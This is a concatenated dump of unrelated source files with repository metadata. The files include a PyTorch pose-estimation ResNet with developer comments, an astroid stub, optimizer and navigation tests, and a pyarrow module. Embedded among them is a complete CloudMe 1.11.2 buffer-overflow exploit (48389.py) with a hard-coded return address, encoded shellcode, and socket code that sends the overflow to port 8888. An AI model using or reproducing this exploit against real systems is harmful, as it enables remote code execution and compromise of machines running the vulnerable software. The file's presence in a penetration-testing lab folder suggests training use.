# self.avg_pool = nn.AdaptiveAvgPool2d(1)
# self.fcs = nn.Sequential(nn.Linear(channel, int(channel/reduction)),
# nn.LeakyReLU(negative_slope=0.1, inplace=True),
# nn.Linear(int(channel/reduction), channel),
# nn.Sigmoid())
# def forward(self, x):
# bahs, chs, _, _ = x.size()
# # Returns a new tensor with the same data as the self tensor but of a different size.
# y = self.avg_pool(x).view(bahs, chs)
# y = self.fcs(y).view(bahs, chs, 1, 1)
# return torch.mul(x, y)
# class SCSEBlock(nn.Module):
# def __init__(self, channel, reduction=16):
# super(SCSEBlock, self).__init__()
# self.avg_pool = nn.AdaptiveAvgPool2d(1)
# self.channel_excitation = nn.Sequential(nn.Linear(channel, int(channel//reduction)),
# nn.ReLU(inplace=True),
# nn.Linear(int(channel//reduction), channel),
# nn.Sigmoid())
# self.spatial_se = nn.Sequential(nn.Conv2d(channel, 1, kernel_size=1,
# stride=1, padding=0, bias=False),
# nn.Sigmoid())
# def forward(self, x):
# bahs, chs, _, _ = x.size()
# # Returns a new tensor with the same data as the self tensor but of a different size.
# chn_se = self.avg_pool(x).view(bahs, chs)
# chn_se = self.channel_excitation(chn_se).view(bahs, chs, 1, 1)
# chn_se = torch.mul(x, chn_se)
# spa_se = self.spatial_se(x)
# spa_se = torch.mul(x, spa_se)
# return torch.add(chn_se, 1, spa_se)
class BasicBlock(nn.Module):
    expansion = 1  # 【c】where is this used?
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(BasicBlock, self).__init__()
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
self.downsample = downsample
        self.stride = stride  # 【c】where is this used?
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class Bottleneck(nn.Module):
    expansion = 4  # why is it 4, and why write it out explicitly; not 2?
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
padding=1, bias=False) # 【see】
self.bn2 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
self.conv3 = nn.Conv2d(planes, planes * self.expansion, kernel_size=1,
bias=False)
self.bn3 = nn.BatchNorm2d(planes * self.expansion,
momentum=BN_MOMENTUM)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class MultiResNet(nn.Module):
    def __init__(self, block, layers, cfg, **kwargs):  # what does **kwargs stand for here?
self.inplanes = 64
extra = cfg.MODEL.EXTRA
self.deconv_with_bias = extra.DECONV_WITH_BIAS # false
self.method = extra.LOSS_TYPE
super(MultiResNet, self).__init__()
self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
bias=False) # 【see】
self.bn1 = nn.BatchNorm2d(64, momentum=BN_MOMENTUM)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(
kernel_size=3, stride=2, padding=1)
        # 【】replace this with a conv
        self.layer1 = self._make_layer(block, 64, layers[0])  # 3
        # from layer2 on, the first bottleneck of each layer halves the resolution
self.layer2 = self._make_layer(block, 128, layers[1], stride=2) # 4
self.deconv_layers2 = self._make_deconv_layer(
extra.STAGE2.NUM_DECONV_LAYERS, # 3
extra.STAGE2.NUM_DECONV_FILTERS, # 256 256 256
extra.STAGE2.NUM_DECONV_KERNELS, # 4 4 4
)
# self.change_channel_2 =nn.Conv2d(
        #     in_channels=512,  # 【】match the deconv to the channel count of the corresponding resnet stage
# out_channels=256,
# kernel_size=1, # 1
# stride=1,
# padding=0
# )
self.layer3 = self._make_layer(block, 256, layers[2], stride=2) # 6
self.deconv_layers3 = self._make_deconv_layer(
extra.STAGE3.NUM_DECONV_LAYERS, # 3
extra.STAGE3.NUM_DECONV_FILTERS, # 256 256 256
extra.STAGE3.NUM_DECONV_KERNELS, # 4 4 4
)
        # self.change_channel_3 = nn.Conv2d(  # the parameter count is too large: only 1M
        #     in_channels=1024,  # 【】match the deconv to the channel count of the corresponding resnet stage
# out_channels=256,
# kernel_size=1, # 1
# stride=1,
# padding=0
# )
self.layer4 = self._make_layer(block, 512, layers[3], stride=2) # 3
self.deconv_layers4 = self._make_deconv_layer(
extra.STAGE4.NUM_DECONV_LAYERS, # 3
extra.STAGE4.NUM_DECONV_FILTERS, # 256 256 256
extra.STAGE4.NUM_DECONV_KERNELS, # 4 4 4
)
# self.sse_attention = SSEBlock(256)
# used for deconv layers
self.final_layer = nn.Conv2d(
            in_channels=256,  # 【】match the deconv to the channel count of the corresponding resnet stage
out_channels=cfg.MODEL.NUM_JOINTS,
kernel_size=extra.FINAL_CONV_KERNEL, # 1
stride=1,
padding=1 if extra.FINAL_CONV_KERNEL == 3 else 0 # 0
)
# self.channel_att2 = SCSEBlock(512,16)
# self.channel_att3 = SCSEBlock(1024,16)
# self.channel_att4 = SCSEBlock(2048,16)
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion, momentum=BN_MOMENTUM),
            )  # keep resolution and channel count consistent
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
# print(i,self.inplanes)
return nn.Sequential(*layers)
def _get_deconv_cfg(self, deconv_kernel, index):
if deconv_kernel == 4:
padding = 1
output_padding = 0
elif deconv_kernel == 3:
padding = 1
            output_padding = 1  # 【】what is this?
elif deconv_kernel == 2:
padding = 0
output_padding = 0
return deconv_kernel, padding, output_padding
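        # Note: for a stride-2 ConvTranspose2d the output size is
        #   out = (in - 1) * stride - 2 * padding + kernel + output_padding
        # so each (kernel, padding, output_padding) triple above, (4, 1, 0), (3, 1, 1)
        # and (2, 0, 0), yields an exact 2x upsampling of the input feature map.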
def _make_deconv_layer(self, num_layers, num_filters, num_kernels):
assert num_layers == len(num_filters), \
'ERROR: num_deconv_layers is different len(num_deconv_filters)'
assert num_layers == len(num_kernels), \
'ERROR: num_deconv_layers is different len(num_deconv_filters)'
layers = []
in_channels = self.inplanes
        for i in range(num_layers):  # only 3?
kernel, padding, output_padding = \
                self._get_deconv_cfg(num_kernels[i], i)  # returns 4, 1, 0
planes = num_filters[i] # 256 256 256
layers.append(
nn.Sequential(
DwTrans(
in_channels,
out_channels=planes,
kernel_size=kernel,
stride=2,
padding=padding,
output_padding=output_padding,
bias=self.deconv_with_bias),
nn.BatchNorm2d(planes, momentum=BN_MOMENTUM),
nn.ReLU(inplace=True),
                    # additional convolutions appended after the deconv
# nn.Conv2d(256,256,3,1,1),
# nn.BatchNorm2d(256, momentum=BN_MOMENTUM),
# nn.ReLU(inplace=True),
# nn.Conv2d(256,256,3,1,1),
# nn.BatchNorm2d(256, momentum=BN_MOMENTUM),
# nn.ReLU(inplace=True),
))
in_channels = planes
        return nn.ModuleList(layers)  # 【see】changed
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
# print(self.inplanes)
x1 = self.layer1(x)
# print(x.shape)
# print(self.inplanes)
x2 = self.layer2(x1)
# print(x.shape)
# print(self.inplanes)
x3 = self.layer3(x2)
# print(x.shape)
        x4 = self.layer4(x3)  # the first 4 layers are just the ordinary resnet structure? yes
# print(x.shape,'over')
# x2 = self.channel_att2(x2)
        xd2 = self.deconv_layers2[0](x2)  # skip connection + x1
# x2 = self.change_channel_2(x2)
# x3 = self.channel_att3(x3)
xd3_first = self.deconv_layers3[0](x3)
# print(len(self.deconv_layers3),xd3_first.shape,xd2.shape)
xd3 = self.deconv_layers3[1](xd3_first)
        # x3 = self.change_channel_3(x3)  # change the channels after deconv3 has been applied
# x4 = self.channel_att4(x4)
xd4 = self.deconv_layers4[0](x4)
        xd4 = self.deconv_layers4[1](xd4)  # x2 or xd3_first?
        xd4 = self.deconv_layers4[2](xd4)  # or xd3??
        # # deep guides shallow  #【l】
        # xd4 = torch.mul(xd4,self.sse_attention(xd4))
        # xd3 = torch.mul(xd3,self.sse_attention(xd3))
        # xd2 = torch.mul(xd2,self.sse_attention(xd2))  # top level
        # shallow guides deep  #【c】
        # xd4 = torch.mul(xd4,self.sse_attention(xd2))
        # xd3 = torch.mul(xd3,self.sse_attention(xd2))
        # xd2 = torch.mul(xd2,self.sse_attention(xd2))  # top level
if self.method == 'zhongji_loss':
out = []
out.append(xd2)
out.append(xd3)
out.append(xd4)
for i in range(len(out)):
out[i] = self.final_layer(out[i])
return out
elif self.method == 'sum_loss':
x = xd4+xd3+xd2
x = self.final_layer(x) # 1x1
return x
def init_weights(self, pretrained=''):
if os.path.isfile(pretrained):
logger.info('=> init deconv2 weights from normal distribution')
for name, m in self.deconv_layers2.named_modules():
if isinstance(m, nn.Conv2d):
# nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
nn.init.normal_(m.weight, std=0.001)
logger.info(
'=> init {}.weight as normal(0, 0.001)'.format(name))
if isinstance(m, nn.ConvTranspose2d):
logger.info(
'=> init {}.weight as normal(0, 0.001)'.format(name))
logger.info('=> init {}.bias as 0'.format(name))
nn.init.normal_(m.weight, std=0.001)
if self.deconv_with_bias:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
logger.info('=> init {}.weight as 1'.format(name))
logger.info('=> init {}.bias as 0'.format(name))
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
logger.info('=> init deconv3 weights from normal distribution')
for name, m in self.deconv_layers3.named_modules():
if isinstance(m, nn.Conv2d):
# nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
nn.init.normal_(m.weight, std=0.001)
if isinstance(m, nn.ConvTranspose2d):
logger.info(
'=> init {}.weight as normal(0, 0.001)'.format(name))
logger.info('=> init {}.bias as 0'.format(name))
nn.init.normal_(m.weight, std=0.001)
if self.deconv_with_bias:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
logger.info('=> init {}.weight as 1'.format(name))
logger.info('=> init {}.bias as 0'.format(name))
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
logger.info('=> init deconv4 weights from normal distribution')
            for name, m in self.deconv_layers4.named_modules(): # TODO: is there a simpler way to initialise all deconv branches at once?
if isinstance(m, nn.Conv2d):
# nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
nn.init.normal_(m.weight, std=0.001)
if isinstance(m, nn.ConvTranspose2d):
logger.info(
'=> init {}.weight as normal(0, 0.001)'.format(name))
logger.info('=> init {}.bias as 0'.format(name))
nn.init.normal_(m.weight, std=0.001)
if self.deconv_with_bias:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
logger.info('=> init {}.weight as 1'.format(name))
logger.info('=> init {}.bias as 0'.format(name))
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
logger.info('=> init final conv weights from normal distribution')
for m in self.final_layer.modules():
if isinstance(m, nn.Conv2d):
# nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
logger.info(
'=> init {}.weight as normal(0, 0.001)'.format(name))
logger.info('=> init {}.bias as 0'.format(name))
nn.init.normal_(m.weight, std=0.001)
nn.init.constant_(m.bias, 0)
pretrained_state_dict = torch.load(pretrained)
logger.info('=> loading pretrained model {}'.format(
                pretrained)) # the deconv layers and final layer are initialised above; the pretrained checkpoint provides the ResNet backbone weights
self.load_state_dict(pretrained_state_dict, strict=False)
else:
logger.info('=> init weights from normal distribution')
for m in self.modules():
if isinstance(m, nn.Conv2d):
# nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
nn.init.normal_(m.weight, std=0.001)
# nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.ConvTranspose2d):
nn.init.normal_(m.weight, std=0.001)
if self.deconv_with_bias:
                        # why not just reuse the branch above? that branch only initialises the deconv head
nn.init.constant_(m.bias, 0)
resnet_spec = {
    18: (BasicBlock, [2, 2, 2, 2]), # 18 is the dict key (ResNet depth)
34: (BasicBlock, [3, 4, 6, 3]),
    50: (Bottleneck, [3, 4, 6, 3]), # differs from resnet-34 by using Bottleneck blocks
101: (Bottleneck, [3, 4, 23, 3]),
152: (Bottleneck, [3, 8, 36, 3])
}
# test
def get_pose_net(cfg, is_train, **kwargs):
    num_layers = cfg.MODEL.EXTRA.NUM_LAYERS
    # how the chosen depth (e.g. 50) maps to its Bottleneck block: the lookup on the next line
    block_class, layers = resnet_spec[num_layers]
    model = MultiResNet(block_class, layers, cfg, **kwargs)
    if is_train and cfg.MODEL.INIT_WEIGHTS:
        model.init_weights(cfg.MODEL.PRETRAINED) # the method only runs when it is called explicitly
return model
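# Illustrative usage sketch, kept as comments (assumptions: the cfg object provides
# MODEL.EXTRA.NUM_LAYERS, MODEL.NUM_JOINTS, the STAGEn.NUM_DECONV_* fields,
# MODEL.INIT_WEIGHTS and MODEL.PRETRAINED, matching the experiment config used here):
#     model = get_pose_net(cfg, is_train=True)
#     heatmaps = model(torch.randn(1, 3, 256, 192))
#     # a list of heatmap tensors [xd2, xd3, xd4] when the model's method is 'zhongji_loss',
#     # or a single summed heatmap tensor when it is 'sum_loss'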
| 38.707415
| 116
| 0.549003
|
dffa55ad843dd8d85009ce62fd84ab4bd4e24749
| 817
|
py
|
Python
|
venv/lib/python3.8/site-packages/astroid/brain/brain_threading.py
|
VikrantAgrahari/littlegenius
|
f7a7d5f2ecacb862317df35e83de4ae43b5a1bc9
|
[
"MIT"
] | 10
|
2020-07-21T21:59:54.000Z
|
2021-07-19T11:01:47.000Z
|
Thonny/Lib/site-packages/astroid/brain/brain_threading.py
|
Pydiderot/pydiderotIDE
|
a42fcde3ea837ae40c957469f5d87427e8ce46d3
|
[
"MIT"
] | 51
|
2019-10-08T01:53:02.000Z
|
2021-06-04T22:02:21.000Z
|
Thonny/Lib/site-packages/astroid/brain/brain_threading.py
|
Pydiderot/pydiderotIDE
|
a42fcde3ea837ae40c957469f5d87427e8ce46d3
|
[
"MIT"
] | 10
|
2021-05-13T16:18:53.000Z
|
2021-11-08T14:30:08.000Z
|
# -*- coding: utf-8 -*-
# Copyright (c) 2016 Claudiu Popa <pcmanticore@gmail.com>
# Copyright (c) 2017 Łukasz Rogalski <rogalski.91@gmail.com>
# Licensed under the LGPL: https://www.gnu.org/licenses/old-licenses/lgpl-2.1.en.html
# For details: https://github.com/PyCQA/astroid/blob/master/COPYING.LESSER
import astroid
def _thread_transform():
return astroid.parse(
"""
class lock(object):
def acquire(self, blocking=True, timeout=-1):
pass
def release(self):
pass
def __enter__(self):
return True
def __exit__(self, *args):
pass
def locked(self):
return False
def Lock():
return lock()
"""
)
astroid.register_module_extender(astroid.MANAGER, "threading", _thread_transform)
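# Illustrative sketch of what the extender above enables (an assumption about usage,
# kept as comments): once registered, astroid can infer the stub object returned by
# threading.Lock().
#     node = astroid.extract_node("import threading; threading.Lock()")
#     inferred = next(node.infer())  # an instance of the 'lock' stub class defined above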
| 25.53125
| 85
| 0.620563
|
3a5b082fa98d449bae223acc0e76a71705dfd4a3
| 1,148
|
py
|
Python
|
tests/test_navigation.py
|
daviur/voombot_simulator
|
729dbd6624764bb405315846b8fbb6cec337e2dc
|
[
"MIT"
] | null | null | null |
tests/test_navigation.py
|
daviur/voombot_simulator
|
729dbd6624764bb405315846b8fbb6cec337e2dc
|
[
"MIT"
] | null | null | null |
tests/test_navigation.py
|
daviur/voombot_simulator
|
729dbd6624764bb405315846b8fbb6cec337e2dc
|
[
"MIT"
] | null | null | null |
import pytest
from voombot_simulator.navigation import CardinalPoint, Coordinates2D
def test_add_coordinates():
assert Coordinates2D(2, 3) + Coordinates2D(-1, -3) == Coordinates2D(1, 0)
@pytest.mark.parametrize('coord1,coord2,expected', [
(Coordinates2D(1, 1), Coordinates2D(1, 1), True),
(Coordinates2D(1, 1), Coordinates2D(0, 0), False)
])
def test_equality(coord1, coord2, expected):
assert (coord1 == coord2) is expected
def test_coordinates_order():
assert Coordinates2D(2, 3) <= Coordinates2D(5, 6)
@pytest.mark.parametrize('input,expected', [
(CardinalPoint.N, CardinalPoint.E),
(CardinalPoint.E, CardinalPoint.S),
(CardinalPoint.S, CardinalPoint.W),
(CardinalPoint.W, CardinalPoint.N)
])
def test_clockwise(input, expected):
assert CardinalPoint.clockwise(input) == expected
@pytest.mark.parametrize('input,expected', [
(CardinalPoint.N, CardinalPoint.W),
(CardinalPoint.W, CardinalPoint.S),
(CardinalPoint.S, CardinalPoint.E),
(CardinalPoint.E, CardinalPoint.N)
])
def test_counter_clockwise(input, expected):
assert CardinalPoint.counter_clockwise(input) == expected
| 28.7
| 77
| 0.726481
|
f7974190526d4dcfa6f58848aeb4822711686b8e
| 1,347
|
py
|
Python
|
python/pyarrow/flight.py
|
DeliangFan/arrow
|
7b43bcfaad5b8146f54d9975adb9bb8c88fbc60d
|
[
"Apache-2.0"
] | 1
|
2021-07-07T07:13:51.000Z
|
2021-07-07T07:13:51.000Z
|
python/pyarrow/flight.py
|
DeliangFan/arrow
|
7b43bcfaad5b8146f54d9975adb9bb8c88fbc60d
|
[
"Apache-2.0"
] | 1
|
2019-02-24T17:12:35.000Z
|
2019-02-24T18:46:21.000Z
|
python/pyarrow/flight.py
|
DeliangFan/arrow
|
7b43bcfaad5b8146f54d9975adb9bb8c88fbc60d
|
[
"Apache-2.0"
] | 3
|
2021-03-23T19:45:48.000Z
|
2021-03-23T21:36:16.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from pyarrow._flight import (Action, # noqa
ActionType,
DescriptorType,
FlightClient,
FlightDescriptor,
FlightEndpoint,
FlightInfo,
FlightServerBase,
GeneratorStream,
Location,
Ticket,
RecordBatchStream,
Result)
| 43.451613
| 62
| 0.582777
|
a1e6add303e8eda7c5e734eac01a72e276824fd6
| 2,646
|
py
|
Python
|
Machines/BUFF/x-files/48389.py
|
limitedeternity/HackTheBox
|
ed8d6fc7ff7b880b1961098bedca1fc5fdf7fd09
|
[
"MIT"
] | null | null | null |
Machines/BUFF/x-files/48389.py
|
limitedeternity/HackTheBox
|
ed8d6fc7ff7b880b1961098bedca1fc5fdf7fd09
|
[
"MIT"
] | null | null | null |
Machines/BUFF/x-files/48389.py
|
limitedeternity/HackTheBox
|
ed8d6fc7ff7b880b1961098bedca1fc5fdf7fd09
|
[
"MIT"
] | 3
|
2021-12-29T10:39:01.000Z
|
2022-03-29T22:56:40.000Z
|
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86
#Instructions:
# Start the CloudMe service and run the script.
import socket
import sys
target = "127.0.0.1"
padding1 = b"\x90" * 1052
EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS = b"\x90" * 30
payload = b""
payload += b"\xba\xa4\x1c\xa2\x72\xd9\xeb\xd9\x74\x24\xf4\x58\x29"
payload += b"\xc9\xb1\x52\x31\x50\x12\x83\xc0\x04\x03\xf4\x12\x40"
payload += b"\x87\x08\xc2\x06\x68\xf0\x13\x67\xe0\x15\x22\xa7\x96"
payload += b"\x5e\x15\x17\xdc\x32\x9a\xdc\xb0\xa6\x29\x90\x1c\xc9"
payload += b"\x9a\x1f\x7b\xe4\x1b\x33\xbf\x67\x98\x4e\xec\x47\xa1"
payload += b"\x80\xe1\x86\xe6\xfd\x08\xda\xbf\x8a\xbf\xca\xb4\xc7"
payload += b"\x03\x61\x86\xc6\x03\x96\x5f\xe8\x22\x09\xeb\xb3\xe4"
payload += b"\xa8\x38\xc8\xac\xb2\x5d\xf5\x67\x49\x95\x81\x79\x9b"
payload += b"\xe7\x6a\xd5\xe2\xc7\x98\x27\x23\xef\x42\x52\x5d\x13"
payload += b"\xfe\x65\x9a\x69\x24\xe3\x38\xc9\xaf\x53\xe4\xeb\x7c"
payload += b"\x05\x6f\xe7\xc9\x41\x37\xe4\xcc\x86\x4c\x10\x44\x29"
payload += b"\x82\x90\x1e\x0e\x06\xf8\xc5\x2f\x1f\xa4\xa8\x50\x7f"
payload += b"\x07\x14\xf5\xf4\xaa\x41\x84\x57\xa3\xa6\xa5\x67\x33"
payload += b"\xa1\xbe\x14\x01\x6e\x15\xb2\x29\xe7\xb3\x45\x4d\xd2"
payload += b"\x04\xd9\xb0\xdd\x74\xf0\x76\x89\x24\x6a\x5e\xb2\xae"
payload += b"\x6a\x5f\x67\x60\x3a\xcf\xd8\xc1\xea\xaf\x88\xa9\xe0"
payload += b"\x3f\xf6\xca\x0b\xea\x9f\x61\xf6\x7d\xaa\x7f\xf6\xf8"
payload += b"\xc2\x7d\x06\x12\x4e\x0b\xe0\x7e\x60\x5d\xbb\x16\x19"
payload += b"\xc4\x37\x86\xe6\xd2\x32\x88\x6d\xd1\xc3\x47\x86\x9c"
payload += b"\xd7\x30\x66\xeb\x85\x97\x79\xc1\xa1\x74\xeb\x8e\x31"
payload += b"\xf2\x10\x19\x66\x53\xe6\x50\xe2\x49\x51\xcb\x10\x90"
payload += b"\x07\x34\x90\x4f\xf4\xbb\x19\x1d\x40\x98\x09\xdb\x49"
payload += b"\xa4\x7d\xb3\x1f\x72\x2b\x75\xf6\x34\x85\x2f\xa5\x9e"
payload += b"\x41\xa9\x85\x20\x17\xb6\xc3\xd6\xf7\x07\xba\xae\x08"
payload += b"\xa7\x2a\x27\x71\xd5\xca\xc8\xa8\x5d\xea\x2a\x78\xa8"
payload += b"\x83\xf2\xe9\x11\xce\x04\xc4\x56\xf7\x86\xec\x26\x0c"
payload += b"\x96\x85\x23\x48\x10\x76\x5e\xc1\xf5\x78\xcd\xe2\xdf"
overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))
buf = padding1 + EIP + NOPS + payload + overrun
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(buf)
except Exception as e:
    print(e)
| 44.1
| 68
| 0.679894
|
a1d3f2c388e0ecf2bbeae8f52cf271c801eb5fbc
| 3,647
|
py
|
Python
|
tests/test_optimizer_with_nn.py
|
ryancinsight/pytorch-optimizer
|
5e7b5edc25f6a2e6f3af532a48380bd68bd45326
|
[
"Apache-2.0"
] | null | null | null |
tests/test_optimizer_with_nn.py
|
ryancinsight/pytorch-optimizer
|
5e7b5edc25f6a2e6f3af532a48380bd68bd45326
|
[
"Apache-2.0"
] | null | null | null |
tests/test_optimizer_with_nn.py
|
ryancinsight/pytorch-optimizer
|
5e7b5edc25f6a2e6f3af532a48380bd68bd45326
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import pytest
import torch
from torch import nn
import torch_optimizer as optim
def make_dataset(seed=42):
rng = np.random.RandomState(seed)
N = 100
D = 2
X = rng.randn(N, D) * 2
# center the first N/2 points at (-2,-2)
mid = N // 2
X[:mid, :] = X[:mid, :] - 2 * np.ones((mid, D))
# center the last N/2 points at (2, 2)
X[mid:, :] = X[mid:, :] + 2 * np.ones((mid, D))
# labels: first N/2 are 0, last N/2 are 1
Y = np.array([0] * mid + [1] * mid).reshape(100, 1)
x = torch.Tensor(X)
y = torch.Tensor(Y)
return x, y
class LogisticRegression(nn.Module):
def __init__(self):
super(LogisticRegression, self).__init__()
self.linear1 = nn.Linear(2, 4)
self.linear2 = nn.Linear(4, 1)
def forward(self, x):
output = torch.relu(self.linear1(x))
output = self.linear2(output)
y_pred = torch.sigmoid(output)
return y_pred
def ids(v):
return '{} {}'.format(v[0].__name__, v[1:])
def build_lookahead(*a, **kw):
base = optim.Yogi(*a, **kw)
return optim.Lookahead(base)
optimizers = [
(build_lookahead, {'lr': 0.1, 'weight_decay': 1e-3}, 200),
(optim.A2GradExp, {'lips': 1.0, 'beta': 1e-3}, 200),
(optim.A2GradInc, {'lips': 1.0, 'beta': 1e-3}, 200),
(optim.A2GradUni, {'lips': 1.0, 'beta': 1e-3}, 200),
(optim.AccSGD, {'lr': 1.0, 'weight_decay': 1e-3}, 200),
(optim.AdaBelief, {'lr': 0.1, 'weight_decay': 1e-3}, 200),
(optim.AdaBound, {'lr': 1.5, 'gamma': 0.1, 'weight_decay': 1e-3}, 200),
(optim.AdaMod, {'lr': 2.0, 'weight_decay': 1e-3}, 200),
(optim.Adafactor, {'lr': None, 'weight_decay': 1e-3}, 200),
(optim.AdamP, {'lr': 0.045, 'weight_decay': 1e-3}, 800),
(optim.AggMo, {'lr': 1.0, 'weight_decay': 1e-3}, 200),
(optim.Apollo, {'lr': 0.1, 'weight_decay': 1e-3}, 200),
(optim.DiffGrad, {'lr': 0.5, 'weight_decay': 1e-3}, 200),
(optim.Lamb, {'lr': 0.01, 'weight_decay': 1e-3}, 200),
(optim.MADGRAD, {'lr': 1.0, 'weight_decay': 1e-3}, 200),
(optim.NovoGrad, {'lr': 0.01, 'weight_decay': 1e-3}, 200),
(optim.PID, {'lr': 0.01, 'weight_decay': 1e-3, 'momentum': 0.1}, 200),
(optim.QHAdam, {'lr': 0.1, 'weight_decay': 1e-3}, 200),
(optim.QHM, {'lr': 0.1, 'weight_decay': 1e-5, 'momentum': 0.2}, 200),
(optim.RAdam, {'lr': 1.0, 'weight_decay': 1e-3}, 200),
(optim.Ranger, {'lr': 0.1, 'weight_decay': 1e-3}, 200),
(optim.RangerQH, {'lr': 0.01, 'weight_decay': 1e-3}, 200),
(optim.RangerVA, {'lr': 0.01, 'weight_decay': 1e-3}, 200),
(optim.SGDP, {'lr': 1.0, 'weight_decay': 1e-3}, 200),
(optim.SGDW, {'lr': 1.0, 'weight_decay': 1e-3}, 200),
(optim.SWATS, {'lr': 1.0, 'weight_decay': 1e-3}, 200),
(optim.Shampoo, {'lr': 0.1, 'weight_decay': 1e-3, 'momentum': 0.8}, 200),
(optim.Yogi, {'lr': 0.1, 'weight_decay': 1e-3}, 200),
(optim.Adahessian, {'lr': 0.1, 'weight_decay': 1e-3}, 200),
]
@pytest.mark.parametrize('optimizer_config', optimizers, ids=ids)
def test_basic_nn_model(optimizer_config):
torch.manual_seed(42)
x_data, y_data = make_dataset()
model = LogisticRegression()
loss_fn = nn.BCELoss()
optimizer_class, config, iterations = optimizer_config
optimizer = optimizer_class(model.parameters(), **config)
init_loss = None
for _ in range(iterations):
y_pred = model(x_data)
loss = loss_fn(y_pred, y_data)
if init_loss is None:
init_loss = loss
optimizer.zero_grad()
loss.backward(create_graph=True)
optimizer.step()
assert init_loss.item() > 2.0 * loss.item()
| 34.733333
| 77
| 0.584042
|
f24cd77bc71b2073013da7be92115efa9950b906
| 370
|
py
|
Python
|
lib/JumpScale/core/config/__init__.py
|
rudecs/jumpscale_core7
|
30c03f26f1cdad3edbb9d79d50fbada8acc974f5
|
[
"Apache-2.0"
] | 1
|
2015-10-26T10:38:13.000Z
|
2015-10-26T10:38:13.000Z
|
lib/JumpScale/core/config/__init__.py
|
rudecs/jumpscale_core7
|
30c03f26f1cdad3edbb9d79d50fbada8acc974f5
|
[
"Apache-2.0"
] | 4
|
2016-08-25T12:08:39.000Z
|
2018-04-12T12:36:01.000Z
|
lib/JumpScale/core/config/__init__.py
|
rudecs/jumpscale_core7
|
30c03f26f1cdad3edbb9d79d50fbada8acc974f5
|
[
"Apache-2.0"
] | 3
|
2016-03-08T07:49:34.000Z
|
2018-10-19T13:56:43.000Z
|
from JumpScale import j
#from JumpScale.core.config.IConfigBase import ConfigManagementItem, GroupConfigManagement, SingleConfigManagement
#from JumpScale.core.config.JConfigBase import ConfiguredItem, ConfiguredItemGroup
#from JumpScale.core.config.ConfigLib import ItemGroupClass, ItemSingleClass
from JumpScale.core.config.JConfig import JConfig
j.config=JConfig()
| 41.111111
| 114
| 0.864865
|
27dec653fc6375567218c0dc9cbcd421a98c353e
| 1,554
|
py
|
Python
|
python/35.search-insert-position.py
|
Zhenye-Na/leetcode
|
95196a45f5709ccf7b970ee5ac84a4bf8fe2301e
|
[
"MIT"
] | 10
|
2019-09-15T00:23:57.000Z
|
2022-01-05T12:53:42.000Z
|
python/35.search-insert-position.py
|
Zhenye-Na/leetcode
|
95196a45f5709ccf7b970ee5ac84a4bf8fe2301e
|
[
"MIT"
] | 3
|
